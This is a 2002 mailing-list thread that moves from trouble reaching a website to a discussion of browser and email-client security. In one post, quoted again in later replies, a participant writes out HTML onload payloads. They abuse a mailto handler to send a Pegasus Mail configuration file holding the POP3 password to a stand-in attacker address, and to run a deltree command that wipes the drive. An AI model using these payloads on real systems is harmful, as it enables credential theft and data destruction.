1. techport80
I just tried to connect to the page, getting an intermediate condition.
With Netscape 4.7, the home page looks horrible, although it is Ok with
IE.
I got no internal server error, but the code bank page asks for a
logon-id a password.
So?
CChris
2. Re: techport80
> I got no internal server error, but the code bank page asks for a
> logon-id a password.
>
> So?
It also says "Not a member?" which can click on to become a member.
----------------
cheers,
Derek Parnell
3. Re: techport80
Kat wrote:
> If you have IE 6.x it may be a bit harder to disable Java, since MS has taken
>
> away many of those settings which allow you to close the backdoors and
> loopholes. Javascript is even worse. Do you want to show webpages, or do
> you want people to open up their computers to any ole script kiddie? If you
> require me to breach security on my computers to see your webpages, let
> me assure you it's not worth it.
You are never safe on a system where web broswer runs under root privilegies.
Even with all scripting disabled.
Eg. with Pegasus Mail v3.12c and IE using this HTML:
<body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
I can possibly obtain your POP3 password. Or this :
<body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
may delete some files. Somebody who is about security should be running
at least Win2000. (But I am on Win98 
Martin
4. Re: techport80
On 18 Sep 2002, at 14:22, Martin Stachon wrote:
>
> Kat wrote:
> > If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > taken
> >
> > away many of those settings which allow you to close the backdoors and
> > loopholes. Javascript is even worse. Do you want to show webpages, or do you
> > want people to open up their computers to any ole script kiddie? If you
> > require me to breach security on my computers to see your webpages, let me
> > assure you it's not worth it.
>
> You are never safe on a system where web broswer runs under root privilegies.
> Even with all scripting disabled.
>
> Eg. with Pegasus Mail v3.12c and IE using this HTML:
>
> <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
>
> I can possibly obtain your POP3 password. Or this :
>
> <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
>
> may delete some files.
Too bad i intentionally didn't download all the Pegasus display/scripting files,
and Pegasus has no clue where the IE display engine is, eh?
>Somebody who is about security should be running
> at least Win2000. (But I am on Win98
On the other hand, at one time programmers were in such a rush to add
features, the code wasn't made abuse-proof. So upgrading could actually
install be more of a problem than anything it could be fixing.
Kat
5. Re: techport80
On 0, Kat <kat at kogeijin.com> wrote:
> > Thanks for posting the article on Java security. Very informative. I
> > would like to point out a new key points about that article and that web
> > page though. Also I agree with you in the fact that newer isn't always
> > better. Further, I would like to state that JavaScript is used
> > sparingly on my website and that you can read anything on my site should
> > you choose to turn JavaScript off.
>
> Strangely, turning it off, *if you can*, doesn't prevent your puter from going
>
> out to download the latest addons to the scripting languages, as i found out
> the hard way a few months ago. They are downloaded, even if you had
> checked Do Not Run, in case you might want to run them later. The badly
> botched auto-install deleted/corrupted needed files for IE and Explorer. I am
> still missing the proper icon for IE, but that's no problem.
>
Ah, the joys of Linux and Opera 
> > JavaScript is safe. There is very little you can do with
> > JavaScript, as a standalone tool, that is not what it was intended to
> > do. When combined with other tools, JavaScript poses a little more of a
> > risk, but that risk is minimal.
>
> I lost a computer to javascript. The bios was written to, and was not
> recoverable or replaceable. The harddrive was corrupted, and i lost a lot of
> material. Javascript is used for redirects, windows that can't be closed, etc
> etc.
>
Its hard to believe thats possible. I dont see how javascript can
corrupt
a filesystem, or overwrite a BIOS!! What browser and what version and
which
site was this?
--
6. Re: techport80
On 19 Sep 2002, at 19:11, jbrown105 at speedymail.org wrote:
>
> On 0, Kat <kat at kogeijin.com> wrote:
> > > Thanks for posting the article on Java security. Very informative. I
> > > would like to point out a new key points about that article and that web
> > > page though. Also I agree with you in the fact that newer isn't always
> > > better. Further, I would like to state that JavaScript is used sparingly
> > > on
> > > my website and that you can read anything on my site should you choose to
> > > turn JavaScript off.
> >
> > Strangely, turning it off, *if you can*, doesn't prevent your puter from
> > going
> > out to download the latest addons to the scripting languages, as i found out
> > the hard way a few months ago. They are downloaded, even if you had checked
> > Do
> > Not Run, in case you might want to run them later. The badly botched
> > auto-install deleted/corrupted needed files for IE and Explorer. I am still
> > missing the proper icon for IE, but that's no problem.
> >
>
> Ah, the joys of Linux and Opera
Well, or remove scripting engines or their required dlls. I can't run the
Melissa virus for example, and i tried to. The code snippet for getting
passwords in OE and Pegasus posted by Martin don't work on me either, i
tried them. For several trojans, even if i did get them, the firewall blocks the
outgoing as well as the incoming, so they can't send back out. Etc.
> > > JavaScript is safe. There is very little you can do with
> > > JavaScript, as a standalone tool, that is not what it was intended to
> > > do. When combined with other tools, JavaScript poses a little more of a
> > > risk, but that risk is minimal.
> >
> > I lost a computer to javascript. The bios was written to, and was not
> > recoverable or replaceable. The harddrive was corrupted, and i lost a lot of
> > material. Javascript is used for redirects, windows that can't be closed,
> > etc
> > etc.
> >
>
> Its hard to believe thats possible. I dont see how javascript can
> corrupt
> a filesystem, or overwrite a BIOS!! What browser and what version and
> which
> site was this?
I don't remember the site, and i doubt it's still up. It was several years ago,
on the olde 586 puter, win95, IE4.something, no proxies or firewalls. The bios
settings were to "no writes" in software, but not jumpered in hardware.
Things are different now, and i agree IE is updated, but still, i got bit badly,
and won't drop my chainmaille again, especially with weekly reports that
assorted bugs in java, javascript, browsers, email readers, etc still exist.
Kat
7. Re: techport80
Kat wrote:
> > Kat wrote:
> > > If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > > taken
> > >
> > > away many of those settings which allow you to close the backdoors and
> > > loopholes. Javascript is even worse. Do you want to show webpages, or do
> > > you
> > > want people to open up their computers to any ole script kiddie? If you
> > > require me to breach security on my computers to see your webpages, let me
> > > assure you it's not worth it.
> >
> > You are never safe on a system where web broswer runs under root
> > privilegies.
> > Even with all scripting disabled.
> >
> > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> >
> > <body onload="mailto:evilman at here.com -F
> > c:\pmail\mail\Kat\pmail.ini">
> >
> > I can possibly obtain your POP3 password. Or this :
> >
> > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree
> > c:\*.*">
> >
> > may delete some files.
>
> Too bad i intentionally didn't download all the Pegasus display/scripting
> files,
> and Pegasus has no clue where the IE display engine is, eh?
It has nothing to do with the display engine, just the way MSIE passes
mailto: to Pegasus. (Apparently via command line, and so -F option
can be exploited.) The onload= is used only to fire the link automatically.
But I think there was a patch released for Pegasus to fix that.
> >Somebody who is about security should be running
> > at least Win2000. (But I am on Win98
>
> On the other hand, at one time programmers were in such a rush to add
> features, the code wasn't made abuse-proof. So upgrading could actually
> install be more of a problem than anything it could be fixing.
There are two problems : the system's security architecture and actual
security bugs. While eg. linux can have actually more bugs revealed
(because of open source), Win9x can be never safer than linux, because
any application can do anything. And because everybody codes in C/C++,
bugs will still exist (invalid pointers, buffer overflows...) I hope
to get myself soon rid off this strange mixed 16bit/Dos/32bit Win98 kernel.
(Eg. you can bypass multitasking...)
Martin (doesnt claim himself to be a security expert ;)
8. Re: techport80
On 20 Sep 2002, at 18:22, Martin Stachon wrote:
>
> Kat wrote:
> > > Kat wrote:
> > > > If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > > > taken
> > > >
> > > > away many of those settings which allow you to close the backdoors and
> > > > loopholes. Javascript is even worse. Do you want to show webpages, or do
> > > > you want people to open up their computers to any ole script kiddie? If
> > > > you require me to breach security on my computers to see your webpages,
> > > > let me assure you it's not worth it.
> > >
> > > You are never safe on a system where web broswer runs under root
> > > privilegies. Even with all scripting disabled.
> > >
> > > Eg. with Pegasus Mail v3.12c and IE using this HTML:
> > >
> > > <body onload="mailto:evilman at here.com -F
> > > c:\pmail\mail\Kat\pmail.ini">
> > >
> > > I can possibly obtain your POP3 password. Or this :
> > >
> > > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree
> > > c:\*.*">
> > >
> > > may delete some files.
> >
> > Too bad i intentionally didn't download all the Pegasus display/scripting
> > files, and Pegasus has no clue where the IE display engine is, eh?
>
> It has nothing to do with the display engine, just the way MSIE passes
> mailto: to Pegasus.
Oh, you meant a webpage click passing to email, i thought you meant
recieving html email into Pegasus. Still, my IE doesn't know about Pegasus
either, and i won't use Outlook Express. I copy/paste the address.
Kat
9. Re: techport80
On 19 Sep 2002, at 19:11, jbrown105 at speedymail.org wrote:
>
> On 0, Kat <kat at kogeijin.com> wrote:
> > > Thanks for posting the article on Java security. Very informative. I
> > > would like to point out a new key points about that article and that web
> > > page though. Also I agree with you in the fact that newer isn't always
> > > better. Further, I would like to state that JavaScript is used sparingly
> > > on
> > > my website and that you can read anything on my site should you choose to
> > > turn JavaScript off.
> >
> > Strangely, turning it off, *if you can*, doesn't prevent your puter from
> > going
> > out to download the latest addons to the scripting languages, as i found out
> > the hard way a few months ago. They are downloaded, even if you had checked
> > Do
> > Not Run, in case you might want to run them later. The badly botched
> > auto-install deleted/corrupted needed files for IE and Explorer. I am still
> > missing the proper icon for IE, but that's no problem.
> >
>
> Ah, the joys of Linux and Opera
>
> > > JavaScript is safe. There is very little you can do with
> > > JavaScript, as a standalone tool, that is not what it was intended to
> > > do. When combined with other tools, JavaScript poses a little more of a
> > > risk, but that risk is minimal.
> >
> > I lost a computer to javascript. The bios was written to, and was not
> > recoverable or replaceable. The harddrive was corrupted, and i lost a lot of
> > material. Javascript is used for redirects, windows that can't be closed,
> > etc
> > etc.
> >
>
> Its hard to believe thats possible. I dont see how javascript can
> corrupt
> a filesystem, or overwrite a BIOS!! What browser and what version and
> which
> site was this?
See:
http://www.pcworld.com/news/article/0,aid,104910,00.asp
That url mentions the Java bug (from win95 - winXP), the bug in DOM that
allows javascript to remote admin the puter, and you'll see a link to the Back
Orfice (er,, office,, umm, "help and support") bug in XP, and a link to the
page about the XP SP1 causing XP to nuke itself.
Kat
10. Re: techport80
> See:
> http://www.pcworld.com/news/article/0,aid,104910,00.asp
Good grief!!!!
I've always despised Microsoft, but now I'm just laughing while I cry.
